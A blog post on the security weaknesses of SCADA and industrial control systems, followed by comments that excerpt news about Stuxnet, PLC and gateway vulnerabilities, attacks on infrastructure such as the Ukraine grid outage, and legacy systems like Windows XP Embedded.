SCADA systems security issues

SCADA systems are used to monitor and control critical installations in oil and gas refineries, water and power distribution plants, manufacturing plants and other industrial facilities. There has been a lot of discussion about malware and security in industrial automation systems after Stuxnet. Widely viewed as the most complex piece of computer malware ever created, Stuxnet is believed to have been designed to sabotage uranium enrichment centrifuges at the Iran’s Natanz nuclear plant. If nasty malware can do that, other similar malware can do something else nasty as well.

Attacks against SCADA systems can have potentially very serious consequences. I think that we have been quite lucky that we have not seen any big disasters yet. Even though the attacks are rare at the moment, security researchers are confident that their number will increase, especially since the Stuxnet industrial sabotage worm set a successful precedent. And now there are many news on Dugu worm.

News around one month ago told that SCADA hack shut down a US water plant at 8 November 2011. This hacking attack at a US water plant has been credited to an unknown attacker (handle “pr0f” took credit) who according to hacker sources managed to access a SCADA controller and take over systems. Once again caused security experts to question the security of SCADA systems. Hacker Says Texas Town Used Three Character Password To Secure Internet Facing SCADA System. “This was barely a hack. A child who knows how the HMI that comes with Simatic works could have accomplished this,” he wrote. “You know. Insanely stupid. I dislike, immensely, how the DHS tend to downplay how absolutely (expletive) the state of national infrastructure is. I’ve also seen various people doubt the possibility an attack like this could be done,” he wrote in a note on the file sharing Web site On the other hand Federal officials said there’s no evidence to support a report that hackers destroyed a pump used by an Illinois-based water utility after gaining unauthorized access to the computer system it used to operate its machinery. What is the truth in this case it is hard to say.

What is known that many industrial systems are vulnerable. Siemens Simatic is a common SCADA product and has been the subject of other warnings from security researchers according to Siemens industrial control systems are vulnerable to attack that can cause serious problems. The US Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) warned earlier that Siemens’ SIMATIC S7-1200 programmable logic controllers (PLCs) are vulnerable to so-called replay attacks that can interfere with the normal operations. An attacker with access to the PLC or the automation network could intercept the PLC password and make unauthorized changes to the PLC operation. ISO-TSAP protocol is functioning to specifications; however, authentication is not performed nor are payloads encrypted or obfuscated.

White Paper On Industrial Automation Security In Fieldbus And Field Device Level is an interesting white paper (from Vacon, Nixu and F-secure) that focuses on presenting a generic overview about security in industrial automation. Security aspects of traditional fieldbuses, Ethernet-based networks and wireless communication technologies are presented. Challenges regarding data security in the field of industrial automation are discussed. The properties of industrial automation devices are described with a focus on security, tampering possibilities, and risk mitigation methods.

Many protocols used in industrial control systems were intentionally designed to be open and without security features. As long the the networks that run those protocols are kept physically separate from public network you are quite safe. For the most part SCADA systems are not necessarily designed to be connected to the internet, but engineers can put in workarounds for remote access. Anytime you do this you put in a pathway where someone can get in. And there are often case where remote devices are accessed using those non-secure protocols though unsafe networks (public telephone network, cellular network, radio waves, even Internet).

There has been long time the belief that SCADA systems have the benefit of security through the use of specialized protocols and proprietary interfaces (security through obscurity), networks are physically secured and disconnected from the Internet. Today those beliefs all do not hold anymore. There are nowadays you can find many tools on Internet to work with standard SCADA protocols (for example Wireshark can be used to decode several commonly used SCADA protocols).

The move from proprietary technologies to more standardized and open solutions together with the increased number of connections between SCADA systems and office networks and the Internet has made them more vulnerable to attacks. Modern SCADA systems should be designed so that they can be withstand the situation they are accidentally connected to Internet (it will happen sooner or later). In addition to making SCADA system itself secure, you should separate it from Internet (no connection at all or very strictly configured series of firewalls). FACT CHECK: SCADA Systems Are Online Now article tells at nearly everything is connected now. Nearly all SCADA systems are online. The addition of a simple NAT device is far from bulletproof security access control.

Most of SCADA systems in use are are old computer systems. They are usually horribly patched (“if it ain’t broken, don’t fix it”) and often run very old operating system version. Windows is very commonly used operating systems on SCADA applications, because only few SCADA-packages support other than Windows operational systems. It seems that there are many people who are not happy with the security stance being taken within their organizations around SCADA hosts. Even if you have patches up to date and current anti-malware on a host, all you have done is eliminated some of the risk (and maybe created new risks caused by fact that anti-malware software can sometimes disturb normal system operation). Add a firewall and you have reduced some of the risk. Pile on as much security as you want and people are going to find ways to disable it and make themselves vulnerable.

I wish no one had to worry about hackers in any application, but we do. Unfortunately, data security is never a non-issue.

FACT CHECK: SCADA Systems Are Online Now article mentions an interesting story on Boeing 747 (For those who do not know, modern 747′s are big flying Unix hosts with lots of Ethernet). They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 – VLANs. The security researchers managed to break the VLANs and access other systems (including Engine management systems). The issue here is that all that separated the engine control systems and the open network was VLAN and NAT based filters.


  1. Tomi Engdahl says:

    Super Stuxnet’s SCADA slaves: security is atrocious
    153 computers, six SCADA systems, most C&C points to Iran

    Botnet boffin Peter Kleissner says at least 153 computers are still slaves to Stuxnet.

    Of those, six are tied to supervisory control and data acquisition (SCADA) systems which the malware is designed to exploit to destroy the attached machinery.

    Kleissner told a presentation at an information security conference in Vienna last week that half of all infections stem from Iran, where the super worm was first targeted.

    “The amount of unique identifiers basically equals to unique Stuxnet infections; it is safe to say that in 2013 and 2014 there were at least 153 distinct infected machines with Stuxnet,” Kleissner says in the paper Internet Attacks Against Nuclear Power Plants [PDF].

    “It is inevitable that existing malware infections lower the overall security of the particular machines and the entire networks and therefore make it easier (or possible at all) for anyone else to intrude the system.”

    The infected boxes appear to be isolated puppets no longer being controlled by the United States attackers, but are nonetheless exposed to hijacking by anyone in control of those servers.

    “… any capable intelligence service (or individual with the knowledge and skills) could seize control and potentially cause considerable damage leveraging the remaining infection,” Kleissner says.

  2. Tomi Engdahl says:

    Config file wipe blunder caused deadly Airbus A400M crash – claim
    Probe insiders indicate engine shutdown due to missing data

    A dodgy software installation that deleted vital files caused last month’s Airbus 400M transport plane crash in which four people died, it is claimed.

    On May 9, a test flight of the A400M, intended to replace the aging Hercules as a mainstay of NATO’s air mobility fleet, crashed in Spain, killing four of the six crew. According to Reuters today, a faulty software installation on the aircraft’s systems deleted configuration information, and caused three of the four turboprop engines to shut down after takeoff.

    People familiar with the investigation said the torque calibration parameters for the engines were wiped during the installation. This data is needed to measure and interpret information coming back from the A400M’s engines, and is crucial for the Electronic Control Units (ECU) that control the aircraft’s power systems.

    Without that sensor data, the ECU automatically shut down the engines, or at least put them into the lowest power settings. According to safety documentation, the pilots would only get a warning from the ECUs when the aircraft is 400 feet (120 metres) off the ground.

    “Nobody imagined a problem like this could happen to three engines,” a person familiar with the 12-year-old project said.

    The crashed A400M was being tested before delivery to the Turkish Air Force.

    On May 20, Airbus warned A400M customers to conduct “specific checks of the Electronic Control Units (ECU) on each of the aircraft’s engines.”

  3. Tomi Engdahl says:

    7 benefits of integrating human-machine interfaces, historians

    Cover story: Human-machine interfaces (HMIs) and historians differ but need to be tightly integrated to provide company operations with optimal value. Big data has little value without analysis and access in real time. Seven application examples explain HMI-historian integration benefits, including troubleshooting, analysis, and regulatory compliance.

    Human-machine interfaces (HMIs) and historians differ in purpose but need to be tightly integrated to provide great value to companies’ operations. HMIs provide effective control and interactions between humans and machines. Historians collect high-speed time-series data to maintain a chronology of events.

    Oriental Motor

    With today’s PC standard technology and capabilities, a typical historian system should be able to store and access more than 10 years of raw data. Aggregated manufacturing big data is good for certain reports, and historians should have the features to get access to this data, but it should not be stored as aggregates. Raw data streams are needed for true analysis. A well-performing historian should be able to easily exceed 1 million updates per second when storing data while retrieving more than 3 million updates per second at the same time. Users become quickly frustrated if they cannot get access to the data they need for analysis within a few seconds.

  4. Tomi Engdahl says:

    SCADA systems can be old because “it it works don’t fix it”

    The ancient Amiga been on for 30 years – 19 schools fully dependent on it

    If it works, do not fix it. The ancient Amiga has been responsible for 19 of the American school ventilation and heating for 30 years, says WoodTV.

    The device has to be renewed for a long time, but so far it has not been successful due to lack of money. Responsible for real estate management Tim Hopkins, the spare parts are hard to find.
    Hopkins describes the device “as a unique product.”

    Computer software encoded in due course local high school student. If you have any problems with software, the school asks for help from the same person, who still lives in the community.

    If the device is broken up, all schools systems should be switched on and off manually.


    1980s computer controls GRPS heat and AC

    A 30-year-old computer that has run day and night for decades is what controls the heat and air conditioning at 19 Grand Rapids Public Schools.

    The Commodore Amiga was new to GRPS in the early 1980s and it has been working tirelessly ever since. GRPS Maintenance Supervisor Tim Hopkins said that the computer was purchased with money from an energy bond in the 1980s. It replaced a computer that was “about the size of a refrigerator.”

    The computer is responsible for turning the heat and the air conditioners on and off for 19 school buildings.

    “The system controls the start/stop of boilers, the start/stop of fans, pumps, [it] monitors space temperatures, and so on,” Hopkins explained.

    Parts for the computer are difficult to find, Hopkins said. It is on its second mouse and third monitor.

    “It’s a very unique product. It operates on a 1200-bit modem,” said Hopkins. “How it runs, the software that it’s running, is unique to Commodore.”

    Hopkins said the system runs on a radio frequency that sends a signal to school buildings, which reply within a matter of seconds with the status of each building. The only problem is that the computer operates on the same frequency as some of the walkie-talkies used by the maintenance department.

    “Because they share the same frequency as our maintenance communications radios and operations maintenance radios — it depends on what we’re doing — yes, they do interfere,” Hopkins said.

    If the computer stopped working tomorrow, a staff person would have to turn each building’s climate control systems on and off by hand.

    A new, more current system would cost between $1.5 and 2 million.

  5. Tomi Engdahl says:

    MicroLogix 1400 PLC Teardown

    Introducing the MicroLogix 1400 PLC (1766L32BXBA) from Allen Bradley.

    Taking a close look at the large PCB reveals that this is where all the grunt work takes place. The hardware for this PLC was probably designed about 5-6 years ago – the date stamps for the ICs suggest their manufacture was in 2010. Onboard is an Altera Cyclone 2 FPGA and this is where I expect the user’s logic is executed. An FPGA would allow the user to include many more hardware based timers, counters and math operations than is possible with a microcontroller or microprocessor.

    Located underneath the FPGA on the other side of the PCB is 16Mbit of Flash memory. This would be where the FPGA’s bit file resides and is loaded from each time the FPGA is reset.

    Additionally there is a Freescale ColdFire MC5275 microprocessor. A quick check of this device’s datasheet reveals that it is a respectable piece of hardware. My thoughts are this is the device that performs the overall operation of the hardware, where your programming PC interfaces to when monitoring, loading new ladder logic or performing ladder logic online edits. Your new PLC code would some how pass through this device before it is executed in the FPGA.

    The IO interface is handled with the following board. The 2x white ICs are opto-isolators manufactured by Toshiba and used for regular digital inputs.

  6. Tomi Engdahl says:

    Increasingly large numbers of unprotected automation systems

    29.06.2015 at 14:23

    Finnish Communications Regulatory Authority Kyberturvallisuuskeskus is concerned about the large number of unprotected automation equipment. Mapping the Finnish networks doing during the Kyberturvallisuuskeskus spring 2015 is still found in thousands of different types of unprotected automation equipment. The survey discovered devices and device correspond to those observed in previous similar studies unit quantities.

    The largest group consists of a single real estate related automation equipment on which thousands were observed even in this survey. Automation equipment affect the physical world, which can make security incidents related particularly serious. Unprotected automation device can be a threat to other Internet users, for example, if an attacker to harness easily frangible devices denial of service attacks. The owner may not notice inducing addition to their own vulnerability harm to others.


  7. Tomi Engdahl says:

    Monitor aging equipment without replacement

    Electrical gateways provide an inside view of a facility’s electrical distribution and control equipment. Older pieces of large equipment, including motor-control centers, switchgear, and panelboards, were not engineered when proactive energy management was a primary concern. See five key benefits to using electrical gateways.

    Modern gateways also use open protocols, enabling communications with devices that communicate via an open protocol like Modbus, regardless of the manufacturer—allowing for seamless integration into energy management, building management, and facility monitoring systems.

    But how do these new features translate into the actionable intelligence needed to drive continuous improvement?

    Five key benefits

    1. Safety: Monitoring systems can limit the exposure of personnel to potentially hazardous electrical environments by providing remote status and operational parameters.

    2. Reliability: Assessment of data from the monitoring system can reveal issues that could adversely affect the operation and productivity of a facility. Historical data from power monitoring systems can help locate and correct both acute and chronic problems, resulting in increased productivity. Alarm notifications also can be proactively set to warn of underperforming equipment and conditions threatening uptime.

    3. Energy efficiency: A better knowledge of how energy is used within a facility allows for identification of an array of prospects to improve efficiency, minimize waste, and reduce energy consumption. The ability to benchmark performance and export in-depth reports allows for verification of energy management program success.

    4. Simplified maintenance: Trended data and reporting capabilities allow users to better forecast when defined equipment parameters may be exceeded, allowing facility management to plan ahead instead of facing an unscheduled shutdown of equipment.

    5. Operational costs: Each benefit discussed above either directly or indirectly influences a business’ bottom line. In most cases, the monetary impact from even one or two benefits can quickly justify the purchase and installation of a power monitoring system. Monitoring systems also can be scaled from one single piece of equipment to an entire facility—allowing for incremental expansion with budget and facility growth.

  8. Tomi Engdahl says:

    Teardown: Ruggedness and flexibility keep PLCs strong in industrial–Ruggedness-and-flexibility-keep-PLCs-strong-in-industrial?_mc=NL_EDN_EDT_EDN_weekly_20150709&cid=NL_EDN_EDT_EDN_weekly_20150709&elq=0387bc473ecc4fd9886d085dea87d0b6&elqCampaignId=23847&elqaid=26929&elqat=1&elqTrackId=84189b6995e54a69a95ec64248ad3589

    The modern programmable logic controller (PLC) is at the nexus of two debates that are taking place daily at opposite ends of the control-system spectrum. At one end is the debate over the ideal technology for digital I/O isolation and protection. At the other end, and at a much higher architectural level, is the debate over which is better: PLC-based control or PC/embedded computer-based control.

    Given the increasing importance of factory, industrial, and manufacturing automation, we jumped on the opportunity to tear down a popular PLC, the Allen-Bradley Micro850, and explore some of the choices made in its design to shed light on core I/O isolation options along with some of the elements that go into a well-known PLC design.

    PLCs have a long and storied history, with Allen-Bradley itself coining the term “programmable logic controller” in 1971 when it introduced its version of what was then called the “programmable controller.” Allen-Bradley was since bought by Rockwell Automation. The term PLC quickly took hold,

    For anyone who cut their teeth on ladder logic can testify, PLCs at the time were an elegantly simple solution to an age-old problem: making control systems reconfigurable without having to manually rewire or reconnect the hardware.

    For industrial control and automation, these Windows-based PCs and embedded computers offered higher processing power, greater programming flexibility, more ecosystem support and lower cost.

    Meanwhile, PLCs held on to their core advantages of ruggedness, simplicity, reliability, durability and “trust,” a critical factor when downtime can result in losses ranging from thousands to many millions of dollars. Control engineers and technicians knew they could rely upon PLCs and knew how to troubleshoot or swap them out quickly and easily if anything ever did go wrong.

    While PCs may have been invading the factory floor, PLCs weren’t standing still. PCs seemed to be winning the battle in the late nineties and 2000s, but PLCs were becoming more powerful and adopting more standard operating systems and programming languages and methodologies, such as C, while also becoming more open.

  9. Tomi Engdahl says:

    Embedded automation computer with multiple connectivity ports

    Advantech’s UNO-1372G small-size control DIN-rail embedded automation computer features has multiple connectivity, sensor, communication, and data transfer ports and can operate in harsh conditions.

    Advantech’s UNO-1372G DIN-rail embedded automation computer features three GbE ports for fast data transfer, two mPCIe slots to enable connection to 3rd party devices, one mSATA connector, and one SATA for a SSD or HDD, two COM ports, three USB ports, eight digital I/O ports, and HDMI/VGA ports.

    The UNO-1372G has an operating temperature range of -20 C to 60 C

    Options available include fieldbus protocols such as Profibus, Profinet, EtherCAT, and Powerlink

    Communication options include GPS, 3G, LTE, ZigBee, RFID, and Bluetooth.

  10. Tomi Engdahl says:

    SCADA cyber security

    Securing control systems with supervisory control and data acquisition (SCADA): SCADA software, part of many industrial control systems, can use the U.S. National Institute of Standards and Technology (NIST) framework for cyber security.

    To meet cyber security concerns, software and hardware vendors, system integrators, and other stakeholders need to work with end users to achieve a secure supervisory control and data acquisition (SCADA) solution. The U.S. National Institute of Standards and Technology (NIST) offers the Cybersecurity Framework (“the Framework”) for systematically identifying the critical assets of the organization, identifying threats, and securing these critical assets. The Framework opens the door to partnerships that are more effective with cyber security prioritized so that the needs of the end user are fully met.

    Cyber financial attacks such as the 83 million household and small-business records stolen from JPMorgan Chase Bank (Reuters, 2014) contribute to the 78% increase in financial impact of cybercrime in the past four years. In this same period, 40% of cyberattacks have been directed against energy companies (Siegel, Josh; Motorola Solutions, 2014). The U.S. government is focusing on the threat to the nation’s critical infrastructure such as our electric grid, oil and gas pipelines, water and wastewater treatment facilities, and transportation infrastructure like tunnels and bridges.

  11. Tomi Engdahl says:

    Cyber security in process plants: Recognizing risks, addressing current threats

    As attacks on industrial control systems (ICSs) become more frequent and increasingly sophisticated, defensive strategies must evolve to keep up. Fortunately, the tools are getting better. See related video.

    Process industries are no place for uncertainty and risk. Companies in the oil and gas, refining, petrochemical, and power-generation industries, among others, must prevent and mitigate cyber security threats that jeopardize their production operations, including risks to plant infrastructure, assets, personnel, and the environment.

    Industrial firms should need to take certain steps to protect critical facilities. Taking those steps is easier with an understanding of current and future cyber security risks, past incidents in process sectors, and knowledge of ever-changing security challenges.

    In recent years, industrial cyber security threats have grown from the esoteric practice of a few specialists to a problem of general concern. All stakeholders now have a new responsibility in promoting the safety, reliability, and stability of critical industrial infrastructure.

    Taking steps to address ICS cyber security should also improve the control system’s resilience to other adverse incidents, reducing unplanned downtime and facilitating a more rapid return to “business as usual” following an incident.

    For industrial sites, vulnerabilities to cyber threats include:

    Lack of security policies and procedures
    Communications between the Internet to the corporation
    Communications between the business LAN (local area network) and process-control network
    Insufficient or out-of-date cyber security controls, such as anti-malware software
    Obsolete or missing security patches
    Inadequate security configurations
    Incomplete or infrequent backups.

  12. Noel Martinez says:

    Very well written article with ample knowledge on scada security. all though scada system is meant to help in making work easier but there is security issues also there.

  13. Tomi Engdahl says:

    Yokogawa patches widespread SCADA vulnerability
    Networking process crashed by crafted packets

    One of the world’s major suppliers of industrial networking kit, Japanese company Yokogawa, has alerted the world to a vulnerability in 21 of its products.

    The ICS-CERT advisory, here, identifies the company’s CENTUM, ProSafe-RS, STARDOM, FAST/TOOLS and other systems as being at risk.

    The vulns are “stack-based buffer overflow vulnerabilities”, the advisory states.

    The overflows are in systems both with a Windows interface, and with embedded versions (such as the ProSafe’s human-machine interface).

    There are two denial-of-service vulnerabilities that can be triggered by a remote attacker by sending a crafted packet to “the process that executes over network communications”, cutting off communications to the targeted system.

    More seriously, the network communication process can also be crashed by a crafted packet allowing the attacker to execute arbitrary code.

  14. Tomi Engdahl says:

    Nuclear power plant bosses not too cyber-security savvy – report
    No ‘executive-level awareness’ + legacy issues = quite worrying

    The nuclear industry is ignorant of its cybersecurity shortcomings, claimed a report released today, and despite understanding the consequences of an interruption to power generation and the related issues, cyber efforts to prevent such incidents are lacking.

    Nuclear plants don’t understand their cyber vulnerability, stated the Chatham House report, which found industrial, cultural and technical challenges affecting facilities worldwide. It specifically pointed to a “lack of executive-level awareness”.

    The study was conducted over an 18-month period and involved 30 interviews with “experts from several different countries, including the US, UK, Canada, France, Germany, Japan, Ukraine and Russia.”

    Among its more frightening discoveries is that the notion “nuclear facilities are ‘air gapped’” is a “myth”, as “the commercial benefits of internet connectivity mean[s] that nuclear facilities” are increasingly networked.

    Cybersecurity problems facing the industry largely result from legacy issues. As most industrial control systems at nuclear facilities were developed in the 1960s and 1970s (“when computing was in its infancy”) cybersecurity was not a consideration in their design.

    “One example of the ‘insecure by design’ nature of industrial control systems is the lack of authentication and verification,” found the report. This obedience leaves nuclear facilities’ control systems “particularly vulnerable to man-in-the-middle attacks that alter the communication between two devices”.

    The report (PDF) details seven “known cyber security incidents at nuclear facilities” between 1992 and 2014:

    At Ignalina nuclear power plant (1992) in Lithuania, a technician intentionally introduced a virus into the industrial control system, which he claimed was “to highlight cyber security vulnerabilities”.
    The David-Besse nuclear power plant (2003) in Ohio was infected by the Slammer worm which disabled a safety monitoring system for almost five hours.
    The Browns Ferry nuclear power plant (2006) in Alabama experienced a malfunction of both the reactor recirculation pumps and the condensate deminerliser controller (a type of PLC).
    The Hatch nuclear power plant (2008) was shutdown as an unintended consequence of a contractor’s software update.
    An Unnamed Russian nuclear power plant (circa 2010) was revealed by Eugene Kaspersky to have been “badly infected by Stuxnet”.
    South Korea’s Korea Hydro and Nuclear Power Co. commercial network (2014) was breached, and information was stolen. The attack was subsequently attributed to North Korea.
    Natanz nuclear facility and Bushehr nuclear power plant (2010)

    The most well-known incident dated back to 2010, when a worm was found to be burrowing into industrial Supervisory Control And Data Acquisition (SCADA) systems on a global level.
    Dubbed Stuxnet, the worm was programmed to remain dormant unless it detected the particular hardware fingerprint of an industrial software system manufactured by Siemens.

    “The point is that risk is probability times consequence. And even though the probability might be low, the consequence of a cyber incident at a nuclear plant is extremely high.

    Cyber Security at Civil Nuclear Facilities: Understanding the Risks – See more at:

  15. Tomi Engdahl says:

    Search engine can find the VPN that NUCLEAR PLANT boss DIDN’T KNOW was there – report
    No ‘exec-level awareness’, warns research

    The nuclear industry is ignorant of its cybersecurity shortcomings, claimed a report released today, and despite understanding the consequences of an interruption to power generation and the related issues, cyber efforts to prevent such incidents are lacking.

    The report adds that search engines can “readily identify critical infrastructure components with” VPNs, some of which are power plants. It also adds that facility operators are “sometimes unaware of” them.

    Nuclear plants don’t understand their cyber vulnerability, stated the Chatham House report, which found industrial, cultural and technical challenges affecting facilities worldwide. It specifically pointed to a “lack of executive-level awareness”.

    Cybersecurity problems facing the industry largely result from legacy issues. As most industrial control systems at nuclear facilities were developed in the 1960s and 1970s (“when computing was in its infancy”) cybersecurity was not a consideration in their design.

    “One example of the ‘insecure by design’ nature of industrial control systems is the lack of authentication and verification,” found the report. This obedience leaves nuclear facilities’ control systems “particularly vulnerable to man-in-the-middle attacks that alter the communication between two devices”.

    Cyber Security at Civil Nuclear Facilities: Understanding the Risks – See more at:

  16. Tomi Engdahl says:

    Heartbleed, Other Flaws Found in Advantech ICS Gateways

    Researchers at security firm Rapid7 discovered that the latest firmware version for some Advantech EKI products is plagued by several known vulnerabilities.

    Advantech EKI are Modbus gateways designed for connecting serial devices to TCP/IP network-based devices in industrial control environments.

    The Taiwan-based industrial automation company recently released new firmware versions for EKI-136X, EKI-132X and EKI-122X products to address a security flaw related to the existence of hardcoded SSH keys (CVE-2015-6476).

    While analyzing one of the new firmware versions, Rapid7’s HD Moore discovered that it includes version 2.05 of the bash shell, which is known to be vulnerable to Shellshock attacks.

    In addition, the Advantech EKI firmware also includes version 1.0.0e of OpenSSL, which is vulnerable to Heartbleed attacks. The OpenSSL Project will end support for the 1.0.0 version starting with January 1, 2016.

    The DHCP client used by Advantech is also highly outdated and known to contain vulnerabilities, including a high-severity stack-based buffer overflow discovered in 2012.

    Beardsley has pointed out that while none of these flaws are new, the problem is that the vulnerable firmware can be found on production industrial control systems.

    Rapid7 contacted Advantech on November 11 and published a Metasploit module on December 1.

    This is the third time someone has found vulnerabilities in Advantech’s Modbus gateways. In February, the vendor patched a serious flaw that could have been exploited by remote attackers to execute arbitrary code.

  17. Tomi Engdahl says:

    Rockwell Patches Serious ‘FrostyURL’ PLC Vulnerability

    Rockwell Automation has patched a handful of vulnerabilities in its Allen-Bradley MicroLogix programmable logic controllers, including one that researchers say can be exploited with a single malicious URL.

    The so-called FrostyURL vulnerability affects the Allen-Bradley MicroLogix 1100 PLC used to control industrial processes in a number of critical industries. CyberX, a security vendor operating in the industrial control system and SCADA markets, said that a single click of a maliciously crafted URL could affect an operational network.

    “It blew our minds how simple it is,” said Nir Giller, CyberX CTO.

    “This was an ‘Open-Sesame’ moment, as it enabled us to dump all of the PLC’s memory and thus observe the effects of different exploitation techniques we tried later on,” said researcher David Atch. “We successfully reverse engineered the PLC firmware, and we are sure we can find and exploit additional vulnerabilities.” – See more at:

  18. Tomi Engdahl says:

    Iranian hackers ‘targeted’ New York dam

    Iranian hackers penetrated the computers controlling a dam near New York, reveals the Wall Street Journal.

    The 2013 attack did no damage but revealed information about how computers running the flood control system worked, said the paper.

    Hackers working for nation states regularly hit national infrastructure targets, said a separate AP report.

    About 12 times in the last decade hackers have won high-level access to power networks, it said.

    Detailed plans

    Extensive information about the Bowman Avenue dam in Rye, New York state was taken by the hackers, experts familiar with the incident told the newspaper.

    An investigation pointed to Iran as the likely source of the attack and alerted US authorities to the significant cyber warfare capabilities of that nation, said the report The same group of hackers that attacked Bowman Avenue was also implicated in separate attacks on three US financial firms, it added.

    The US power network has also come under regular attack by “sophisticated foreign hackers” said AP in an extensive investigation.

    Many times security researchers had found evidence that hackers had won access to these sensitive systems. So far, all the attacks seemed intent on gathering detailed information, including engineering drawings, about networks and facilities.

    One extensive campaign gave hackers access to 82 separate plants spread across the US and Canada.

    The knowledge accumulated by the attackers has not been used to shut down the power plants or change the way they work

    Hackers could get at the power plants and other parts of national infrastructure because many of the systems were set up long before the need to protect them against remote attacks became apparent.

  19. Tomi Engdahl says:

    Microsoft Windows XP Embedded ends extended support
    Ask Control Engineering: Extended support for Microsoft Windows XP Embedded has ended; what should I do?

    Ask Control Engineering: Since Microsoft has ended extended support for Microsoft Windows XP Embedded support as of Jan. 12, what should I do, if anything?

    Answer: Since Microsoft is no longer offering support for its 15-year-old operating system, Microsoft Windows XP Embedded, so those who have procrastinated now have additional concerns and risks to address.

    “What’s worse,” said one manufacturing IT expert, “is to not even know if you have any XP systems running.”

    warns that users still using Microsoft Windows XP Embedded systems in their facilities will be running into several additional security risks. Finding compatible software will be very difficult and this, in turn, will make the systems more vulnerable to cyber security attacks. Brandl explains that running a complete system inventory will at least make it clear if there’s a potential support problem.

    The long goodbye to Microsoft Windows XP Embedded

    There are those that get work done early, those that get it done on time, and those that procrastinate until every task is an emergency. Those still using Microsoft Windows XP Embedded in their industrial environments will fall into the latter category because Microsoft’s extended support for Windows XP Embedded ends on January 12, 2016. The 15-year-old operating system will no longer be supported or updated, no matter how much users clamor or beg.

    Companies still using Microsoft Windows XP Embedded systems in their facilities will be running into several additional risks. For example, it will be difficult to find compatible hardware and software, and it will be difficult, if not impossible, to get updates to the applications currently running, which will make the systems more vulnerable. If there are Microsoft Windows XP systems running and they can’t be replaced, then take measures to reduce potential risks. What is worse is to not even know if you have any XP systems running.

    It is vital to complete a software and IT hardware inventory of the entire facility, which includes far more than just the production systems. It is important to also consider your laboratory systems, maintenance systems, warehouse systems, tank farm systems, HVAC systems, physical security systems, document management systems, planning systems, and development systems. Without a complete inventory, “hidden” systems under employee’s desks, which are performing critical functions, might go unnoticed. For example, is the scheduling department still using a XP-based tool, or worse: a DOS-based tool; is the laboratory using XP-based test equipment; are the automated material movement systems running XP-based configuration and maintenance software; or is the security department using an XP-based badge scanning system

    At the very minimum, a complete system inventory will make it clear if there’s a potential support problem.

    The worst situation is to have high risk and obsolete systems where there are no readily available replacements.

    In these situations, the first step is to virtualize the hardware, which at least removes the risk of a hardware failure and provides backups in case of software failures. Second, the systems should be isolated from other networks through demilitarized zones (DMZs), firewalls, or physical separation. It is likely the Microsoft Windows XP system will be running vulnerable browsers, databases, applications, and drivers, which makes isolation even more vital. However, virtualization and isolation are only temporary fixes to give the manager time to implement long-term solutions.

    For machines that cannot be upgraded, what needs to change now that Microsoft Windows XP support has ended?
    Ask Control Engineering sought advice from industrial software developers related to the end of Microsoft Windows XP support. Here, Beckhoff Automation provides answers related to Microsoft Windows XP obsolescence.

    Ask Control Engineering: For manufacturers that may not be able to upgrade certain machines or systems past Microsoft Windows XP, what should change now that Microsoft Windows XP support has ended? Answers for related questions below are provided by Debra Lee, software specialist, Beckhoff Automation.

    A. Now that support from Microsoft for Windows XP has ended, machines with this operating system (OS) will no longer be able to get OS updates, including security updates. Naturally, best practices dictate that machines be kept up to date with the latest security updates. However, most of these machines are not connected to the Internet, and those that are generally are not used for surfing the Internet nor do they open files or attachments in software applications such as e-mail, both of which are notorious for the spread of viruses and malware. It is important to note as well that many machines are actually running Windows XP Embedded. Support for Windows XP Embedded is still active and does not end until Jan. 12, 2016.

    Q. If customers cannot upgrade, what should change, if anything, on April 9?

    A. If a security audit finds that access to the machine is secured and there is no Internet connectivity or e-mail “read” access with file download capability on the machine, nothing necessarily needs to change today even if a machine has devices with Windows XP OS on it. If the security audit finds a potential hazard in these areas, however, action may need to be taken to remove the access points, or if that is not possible for some reason, upgrade the device(s) on the machine. Of course, users should remember that Windows XP Embedded support is still active and will continue to be active until the beginning of 2016.

  20. Tomi Engdahl says:

    Security flaw in Advantech gateway leaves the industrial equipment were open – any password to visit

    Manufacturer programming mistake to leave Advantech gateway using embedded into industrial devices open to anyone. Advantech tcp / ip gateways parents serial port equipped industrial equipment can be connected to the Internet for remote management.

    Advantech updated their equipment the last time last fall and removed gateways kovakoodun ssh server password. However, the update does not lacked even greater problem with equipment modified ssh server accepts any password.

    Problem found Rapid7, the company’s researchers. The vulnerability effort published in the autumn of 1.98-versioned operating system software Advantech EKI-1322 gateway. The most recent, published at the end of December, 2.00 version corrects the problem.

    Rapid7 says that the problem arose when the Dropbear called ssh server was changed so much that it is no longer in effect required the users identification.


  21. Tomi Engdahl says:

    The effects of a hacked power grid

    Oil and gas, water and electric power rely on SCADA (supervisory control and data acquisition), protection, and monitoring systems that use communications networks. The use of communications networks makes these systems potentially vulnerable to cyberattack.1

    A power blackout in the Ukraine recently affected about 1.4 million people using an espionage Trojan known as BlackEnergy. The attack looks to be first time that malware has been used to create a large-scale power disruption.

    The power grid failure took down nearly a quarter of the country’s power for several hours. This type of cyber threat is now becoming more of a reality as power delivery and technology continue to merge.

    Today, utilities are faced with a confusing array of cybersecurity guidance, standards, and regulatory requirements.

    Keeping The Lights On — And Hackers From Crossing The Power Lines

    The electric grid in the United States suffers from multiple issues, including inefficiency and high cost. Smart technologies have been touted to solve these and other operational difficulties. Yet, a shift can bring its own problems as well. Mixing power delivery with digital technologies opens up the possibility of disruptions caused by malicious entities. This threat must be seriously considered and mitigated with a carefully crafted strategy.

  22. Tomi Engdahl says:

    The long goodbye to Microsoft Windows XP Embedded

    Microsoft’s extended support for Windows XP Embedded ends on January 12, 2016, and those using the system after the expiration date need to take stock of their situation with a complete system inventory to assess the systems’ support availability and where upgrades are really needed.

    There are those that get work done early, those that get it done on time, and those that procrastinate until every task is an emergency. Those still using Microsoft Windows XP Embedded in their industrial environments will fall into the latter category because Microsoft’s extended support for Windows XP Embedded ends on January 12, 2016. The 15-year-old operating system will no longer be supported or updated, no matter how much users clamor or beg.

    Companies still using Microsoft Windows XP Embedded systems in their facilities will be running into several additional risks. For example, it will be difficult to find compatible hardware and software, and it will be difficult, if not impossible, to get updates to the applications currently running, which will make the systems more vulnerable. If there are Microsoft Windows XP systems running and they can’t be replaced, then take measures to reduce potential risks. What is worse is to not even know if you have any XP systems running.

  23. Tomi Engdahl says:

    BlackEnergy malware activity spiked in runup to Ukraine power grid takedown
    But its role in the attack remains unclear

    Fresh research has shed new light on the devious and unprecedented cyber-attack against Ukraine’s power grid in December 2015.

    A former intelligence analyst has warned that launching similar attacks is within the capabilities of criminals, or perhaps even hacktivist groups, since most of the key components are readily available online.

